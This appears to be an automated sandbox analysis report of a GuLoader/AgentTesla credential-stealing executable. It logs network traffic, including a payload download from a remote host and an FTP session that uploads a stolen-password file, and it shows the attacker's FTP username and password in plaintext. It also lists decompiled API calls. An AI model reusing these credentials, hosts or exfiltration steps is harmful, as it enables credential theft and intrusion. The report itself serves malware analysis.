Dec 9, 2024 11:51:18.903696060 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.903733969 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.903774977 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.905033112 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.905076027 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.905148029 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.905303001 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.906462908 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.906534910 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.906687975 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.906730890 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.907885075 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.907927990 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.907998085 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.908040047 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.909354925 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.909403086 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.909473896 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.909518957 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.910857916 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.910902023 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.911068916 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.911159992 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.912257910 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.912302971 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.912379980 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.912420988 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.913764954 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.913826942 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.913985014 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.914041042 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.915241957 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.915389061 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.915433884 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.916670084 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.916716099 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.916744947 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.916812897 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.918098927 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.918143034 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:21.301223993 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:21.420569897 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:21.420710087 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:22.664783955 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:22.665045977 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:22.784512997 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:23.092427969 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:23.092602015 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:23.212686062 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:23.570451021 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:23.570630074 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:23.691327095 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:23.999263048 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:24.004677057 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:24.124182940 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:24.432157993 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:24.432373047 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:24.551774979 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:24.859484911 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:24.859752893 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:24.978977919 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:25.287765026 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:25.289056063 CET	49728	35590	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:25.336118937 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:25.409399986 CET	35590	49728	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:25.410464048 CET	49728	35590	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:25.411751986 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:25.531007051 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:26.587157011 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:26.587377071 CET	49728	35590	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:26.587445021 CET	49728	35590	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:26.633008003 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:26.707443953 CET	35590	49728	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:26.708287001 CET	35590	49728	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:26.708390951 CET	49728	35590	192.168.2.5	86.107.36.93
Dec 9, 2024 11:51:27.015438080 CET	21	49720	86.107.36.93	192.168.2.5
Dec 9, 2024 11:51:27.054768085 CET	49720	21	192.168.2.5	86.107.36.93
Dec 9, 2024 11:52:23.333213091 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:52:23.333462000 CET	49707	80	192.168.2.5	185.33.55.26

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 11:51:16.094882011 CET	62643	53	192.168.2.5	1.1.1.1
Dec 9, 2024 11:51:16.693027020 CET	53	62643	1.1.1.1	192.168.2.5
Dec 9, 2024 11:51:20.670809031 CET	52688	53	192.168.2.5	1.1.1.1
Dec 9, 2024 11:51:21.297389984 CET	53	52688	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2024 11:51:16.094882011 CET	192.168.2.5	1.1.1.1	0x1acc	Standard query (0)	akonnyuszerkezet.hu	A (IP address)	IN (0x0001)	false
Dec 9, 2024 11:51:20.670809031 CET	192.168.2.5	1.1.1.1	0x6be4	Standard query (0)	ftp.carbognin.it	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 9, 2024 11:51:16.693027020 CET	1.1.1.1	192.168.2.5	0x1acc	No error (0)	akonnyuszerkezet.hu		185.33.55.26	A (IP address)	IN (0x0001)	false
Dec 9, 2024 11:51:21.297389984 CET	1.1.1.1	192.168.2.5	0x6be4	No error (0)	ftp.carbognin.it		86.107.36.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

akonnyuszerkezet.hu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	185.33.55.26	80	4956	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 11:51:16.825259924 CET	206	OUT	GET /image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: akonnyuszerkezet.hu Cache-Control: no-cache
Dec 9, 2024 11:51:18.116560936 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Dec 2024 10:51:17 GMT Content-Type: application/octet-stream Content-Length: 241728 Connection: keep-alive Last-Modified: Mon, 02 Dec 2024 06:34:18 GMT ETag: "d220021-3b040-62843bcf7b24f" Accept-Ranges: bytes Data Raw: d3 e4 54 bc b3 47 a6 c2 a4 52 10 05 05 9c fb e6 04 60 5e a0 44 7a 89 4c 61 8a e9 3f 8a 98 ea 61 4d 0b 9f 45 f3 80 ab ea 10 dc 32 f7 5d 9a fd c7 94 a8 c2 54 78 e9 c7 9e f4 a7 20 24 a4 d1 ed fd d5 e7 c3 58 44 be 55 78 c4 01 4b 30 08 80 0f 6c 57 ec 61 1f 71 1d 2d 0c 59 44 02 33 2a d2 6c f8 de f5 e2 f7 4a 61 93 61 2e f4 d6 22 3c e5 44 5e b7 ba 3c e9 db 9c a2 76 38 32 ca 9a 89 32 eb 4e d1 50 5f 33 96 a4 df 5a d3 76 89 c2 42 cb 0e 47 bf 84 af ff 55 77 c9 4e ac 44 02 0b f2 d7 58 7e e6 e0 f9 fa 76 1c c6 97 1c 47 5d 1e b5 55 87 4a 74 86 75 e6 83 33 0b f8 bd 66 e6 fb 98 50 ee 9b 63 a5 17 cd 61 ec 37 7a 6b c1 20 98 a1 05 40 92 3c ab 4d fa 37 0d 6a 15 e7 12 9f 6e ce 04 60 02 a2 ac 60 68 3d 5f 0e c9 2e 69 f1 31 08 86 76 58 88 7e 5e 3c df ad ff 49 97 8f 06 49 5e 2e 10 f7 4e 75 9e 7c 48 40 cd 9b 7f 54 46 20 bf a3 29 65 69 9c a8 a2 1a 46 ca b4 64 f2 31 f1 ec b4 32 26 ed 6e 0c 4a b7 d0 a1 bc bc 96 7c d5 96 55 bc 06 49 87 a7 bf a9 52 68 5a e7 52 20 93 3e ed a2 7c 26 cf 0e 82 be 1b 68 67 d4 85 a3 5a c0 ed ce 42 ed 04 [TRUNCATED] Data Ascii: TGR`^DzLa?aME2]Tx $XDUxK0lWaq-YD3lJaa."<D^<v822NP_3ZvBGUwNDX~vG]UJtu3fPca7zk @<M7jn``h=_.i1vX~^<II^.Nu\|H@TF )eiFd12&nJ\|UIRhZR >\|&hgZB{u[{w8973(kvS$gzqWcq rxd\|j.f-d+yScqloomPQ/ec=so@-IMOwHm}S:Z>M/WL6mcrRLckJ^#RP?#G[CRV-FJ/A;Y]P4K piQ\|$s>,Pp 3f-!oR~GfV=!/(S:}a/:m=n7"'\|eadE'[Y>+pa,%Gg-b:c\|_77/5r!d(D1O&1p6D1tJnMA5\|.VG_o[=:(Y1"9.mi \>+:\|jetXf2.8%\|cBi#hV1g
Dec 9, 2024 11:51:18.116574049 CET	488	IN	Data Raw: 43 b7 70 d0 82 22 f7 55 07 64 d6 62 83 98 b5 d2 fb 46 f2 0c e8 8d b7 65 d6 30 45 32 f6 e7 9f d7 9a 44 95 72 b5 d2 11 77 c3 64 e0 2e b0 3e 61 01 af 59 74 86 91 11 bc f1 6e cf 02 10 82 fc 98 ee d6 b2 31 af d8 ac 88 b5 2e 3d f8 e3 6c 27 bd f2 87 ad Data Ascii: Cp"UdbFe0E2Drwd.>aYtn1.=l'p0Hic\|85}o@^$a]FlRn9z5#u!1O+>]y2eG"}uv VQxMl~1O*X1=sB<qoY)D
Dec 9, 2024 11:51:18.116704941 CET	1236	IN	Data Raw: 0a 12 31 a1 8f 82 9d 4c 5d 96 e8 19 79 da 15 dd 0f bd fd c1 8a 94 8b c6 88 98 a9 3a 60 a0 3e e4 e5 f5 2f 12 f7 5e 24 d9 5e fa 60 f8 89 e4 3c b4 f4 d9 b9 66 2b 13 66 8f 66 11 e6 e4 66 54 70 83 62 cb 60 2d 87 1c 92 0a 5a 8f e9 80 22 57 94 31 dd 1d Data Ascii: 1L]y:`>/^$^`<f+fffTpb`-Z"W1j5j,Y:n$q09K@\id{P!)u!RS";GvK:=_0dQ>ecz bR=kR_=YP}[}_kq
Dec 9, 2024 11:51:18.116715908 CET	1236	IN	Data Raw: 98 09 46 6c 56 32 bc c9 20 f4 47 2d c3 19 79 19 e7 9d 67 72 b2 59 b5 56 45 7d e6 5b 29 2b 85 a2 30 da aa 2b 39 56 e9 b2 42 e2 2d 1c 28 e4 01 48 b4 41 63 08 8b 42 fb 2b aa 2b 24 f3 54 2f 7d d0 1a 26 a5 bb 9d 2f 9d 24 2e 97 20 b3 60 d0 1d 5f 33 81 Data Ascii: FlV2 G-ygrYVE}[)+0+9VB-(HAcB++$T/}&/$. `_3p`cQE:)#FV#@GZ_*{md7Ps5\|eRqr3-`q)1txoc"y ][K
Dec 9, 2024 11:51:18.116890907 CET	1236	IN	Data Raw: c6 b2 04 fa 78 9d b3 8d 70 57 da 30 f2 df bd d9 9b bf ec 49 7b 36 80 f9 05 5a 2d d6 78 93 4e 0a 68 b2 2c ca a8 b3 13 88 cc 1a c1 66 a6 2f 68 a8 0d a6 31 c2 b1 d0 b6 86 d0 25 62 08 ec 9b 15 c3 3c 54 72 f5 6a fe df 5c 6c 88 01 26 35 7a d1 a5 7a e9 Data Ascii: xpW0I{6Z-xNh,f/h1%b<Trj\l&5zz-g+c7CYq;I<>-HB+Q<Y?KWf4"~#0L9{mm2JV;E[EzV+Xu%H,@{T;]i@#Q3\|
Dec 9, 2024 11:51:18.116982937 CET	672	IN	Data Raw: 53 8d 9d ee 34 ba 79 8f 09 33 24 3b 35 26 07 76 68 92 23 3b 9f 3e 95 41 8d d7 b3 f0 64 11 43 8f 13 55 96 06 07 a6 d0 96 35 a4 16 76 60 05 70 33 30 c6 00 f1 4d 1d ff 55 bf 61 ba 23 bd 22 87 19 92 08 f3 96 b2 a1 c4 6c 07 df 6d a3 37 59 35 46 81 d3 Data Ascii: S4y3$;5&vh#;>AdCU5v`p30MUa#"lm7Y5FUqJn%Kj&1^AC3Pv2oWM+m)%7bf+4D$5"R#`F1iI8_vZ*e1N8.-sJ>fU>FXGKl
Dec 9, 2024 11:51:18.116992950 CET	1236	IN	Data Raw: 56 d3 4c d3 2d 5d 99 23 8d 97 b9 5c eb b4 8b 69 11 4c 94 c9 9a fe 1f 64 82 b2 a0 b3 1e 16 fe b4 fc 27 52 df b2 50 3f e0 ee e7 1a 55 5b 43 8e 89 34 ee a6 50 d3 fa 46 db 2e f0 fa 0a ea 51 09 4d 2f e9 e2 de 7c aa bf ca be 92 c4 f7 ad 02 4b c9 1a 96 Data Ascii: VL-]#\iLd'RP?U[C4PF.QM/\|K.H93gQ\|i*+s4x"ppp4f"cZ'L/Akn<0.n:<]enijM@CAe8c6:G"K}wjS9
Dec 9, 2024 11:51:18.117017031 CET	1236	IN	Data Raw: 2a 55 f9 8b aa 8c 1b 81 c4 e9 98 3a 14 ba 25 0c ca 41 2c c8 d7 6f 33 ac b1 f0 fd fb 5c 79 b8 d9 aa 31 93 ba 5f ff ca 48 1c 8f 0e b7 c6 f6 c0 ab 3a 7c b4 5f b1 6c fa 14 df 4f d9 0d 8c 86 20 a4 d6 29 65 43 13 bc 4d 70 4e 3d 34 93 2e d5 b9 f7 8c b4 Data Ascii: U:%A,o3\y1_H:\|_lO )eCMpN=4.dOLepxAUx>H0obq n3,`Jaw.2D<%JOZ/<3%"h7Vj4<.C`,P07-4=m
Dec 9, 2024 11:51:18.117029905 CET	1236	IN	Data Raw: 01 d3 dc 45 fa ec 44 81 15 19 bf 80 34 52 b9 ca c4 e4 d2 06 bb 17 45 10 48 cb 2d 86 99 83 4e c7 10 6f bc 2b 58 47 e5 ce 90 5d 43 72 41 2e 52 20 9c 1c b5 47 a6 36 7a 6d ca 2c a3 3f 14 86 4b 9b be 83 e4 79 86 22 f2 96 91 8d 04 f5 a8 70 c6 88 d8 db Data Ascii: ED4REH-No+XG]CrA.R G6zm,?Ky"p1=vz`+\|:LD3=k{'tlEkN4S^rLm]nQ_ey1"\yVS~A%Pw3y4paEwIWhzc$t[)\|)Fy42
Dec 9, 2024 11:51:18.117041111 CET	1236	IN	Data Raw: ef 23 5d cf 0d c3 30 e3 8b 09 01 9c af e4 6c 91 72 d4 29 d3 6e a5 9e b5 3e ad d3 eb e8 e9 6e ed 17 93 af 35 8c 9f 54 14 23 f3 ba 1c 1f 4d 44 31 b3 08 12 e0 67 3c 4f c9 61 47 6d 6f d5 b1 ce 6f 31 3a 47 de b6 ef 7a cb 07 02 d4 04 97 8f fd 4a c3 95 Data Ascii: #]0lr)n>n5T#MD1g<OaGmoo1:GzJf;Un{'V++yS?YdVaMraeEg~BD$ag:XyxEGt\|\|c([o[,Z(*A=S]
Dec 9, 2024 11:51:18.236637115 CET	1236	IN	Data Raw: f2 2f 0b 32 eb 6e c7 4f e5 3d 68 1e da 97 f2 30 84 82 8f ca 4e 2f d6 f7 71 8e 1e 03 ae 3c cd d7 2e 6c 93 91 7c 11 92 ca 17 d8 56 6e b2 07 32 2e 33 1e e4 1a d4 6a e7 e7 1d 83 ad c0 0a fe 99 46 ec fb 98 50 10 9a 0a ee 17 cd 2d d5 5e 78 9a 31 e6 f6 Data Ascii: /2nO=h0N/q<.l\|Vn2.3jFP-^x1@l2M)dn\b;`hS1>X2DP y\|hK{G)e2n~tn<FBlhIiicR \|WhgYBuw#g84";3C

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 9, 2024 11:51:22.664783955 CET	21	49720	86.107.36.93	192.168.2.5	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Dec 9, 2024 11:51:22.665045977 CET	49720	21	192.168.2.5	86.107.36.93	USER server@carbognin.it
Dec 9, 2024 11:51:23.092427969 CET	21	49720	86.107.36.93	192.168.2.5	331 User server@carbognin.it OK. Password required
Dec 9, 2024 11:51:23.092602015 CET	49720	21	192.168.2.5	86.107.36.93	PASS 59Cif8wZUH#X
Dec 9, 2024 11:51:23.570451021 CET	21	49720	86.107.36.93	192.168.2.5	230 OK. Current restricted directory is /
Dec 9, 2024 11:51:23.999263048 CET	21	49720	86.107.36.93	192.168.2.5	504 Unknown command
Dec 9, 2024 11:51:24.004677057 CET	49720	21	192.168.2.5	86.107.36.93	PWD
Dec 9, 2024 11:51:24.432157993 CET	21	49720	86.107.36.93	192.168.2.5	257 "/" is your current location
Dec 9, 2024 11:51:24.432373047 CET	49720	21	192.168.2.5	86.107.36.93	TYPE I
Dec 9, 2024 11:51:24.859484911 CET	21	49720	86.107.36.93	192.168.2.5	200 TYPE is now 8-bit binary
Dec 9, 2024 11:51:24.859752893 CET	49720	21	192.168.2.5	86.107.36.93	PASV
Dec 9, 2024 11:51:25.287765026 CET	21	49720	86.107.36.93	192.168.2.5	227 Entering Passive Mode (86,107,36,93,139,6)
Dec 9, 2024 11:51:25.411751986 CET	49720	21	192.168.2.5	86.107.36.93	STOR PW_user-114127_2024_12_09_05_51_19.html
Dec 9, 2024 11:51:26.587157011 CET	21	49720	86.107.36.93	192.168.2.5	150 Accepted data connection
Dec 9, 2024 11:51:27.015438080 CET	21	49720	86.107.36.93	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.428 seconds (measured here), 0.73 Kbytes per second

Target ID:	0
Start time:	05:50:54
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"
Imagebase:	0x400000
File size:	1'002'622 bytes
MD5 hash:	FF83F495808F8837A41405726CE9D7B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.2171267771.000000000074C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2172384343.000000000323D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:51:09
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"
Imagebase:	0x400000
File size:	1'002'622 bytes
MD5 hash:	FF83F495808F8837A41405726CE9D7B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3278956920.00000000017CD000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.9%
Total number of Nodes:	1620
Total number of Limit Nodes:	51

Executed Functions

Function 00403640 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403663
GetVersionExW.KERNEL32(?), ref: 0040368C
GetVersionExW.KERNEL32(0000011C), ref: 004036A3
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
OleInitialize.OLE32(00000000), ref: 0040377D
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
CharNextW.USER32(00000000,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000020,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000000), ref: 004037E9
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
DeleteFileW.KERNELBASE(1033), ref: 00403982
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000000,?), ref: 00403A69
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000000,?), ref: 00403A78

Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000000,?), ref: 00403A83
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe",00000000,?), ref: 00403A8F
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
CopyFileW.KERNEL32(C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,00420F08,00000001), ref: 00403B21
CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
OleUninitialize.OLE32(?), ref: 00403B71
ExitProcess.KERNEL32 ref: 00403B8B
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
ExitProcess.KERNEL32 ref: 00403C1F

Strings

Low, xrefs: 0040394F
TEMP, xrefs: 00403961
C:\Users\user\AppData\Local\Temp\, xrefs: 00403911, 00403916, 0040392C, 00403938, 00403947, 00403954, 00403960, 00403968, 00403A66, 00403A77, 00403A82, 00403A8E, 00403A9F, 00403AAE, 00403B64
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous, xrefs: 00403A3B
UXTHEME, xrefs: 0040372E, 00403733, 00403739
"C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe", xrefs: 004037B6, 004037BC, 004037D1, 004039A8, 004039B4, 00403A02, 00403A0C
1033, xrefs: 0040397D
\Temp, xrefs: 00403933
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403659
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning, xrefs: 00403901, 00403A30, 00403AB7, 00403AC1
Error launching installer, xrefs: 00403A12
C:\Users\user\Desktop, xrefs: 00403A88, 00403A8D, 00403AC0
C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe, xrefs: 00403B1C
NSIS Error, xrefs: 004037A1
TMP, xrefs: 00403969
~nsu, xrefs: 00403A61
SeShutdownPrivilege, xrefs: 00403BB4
.tmp, xrefs: 00403A7D

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
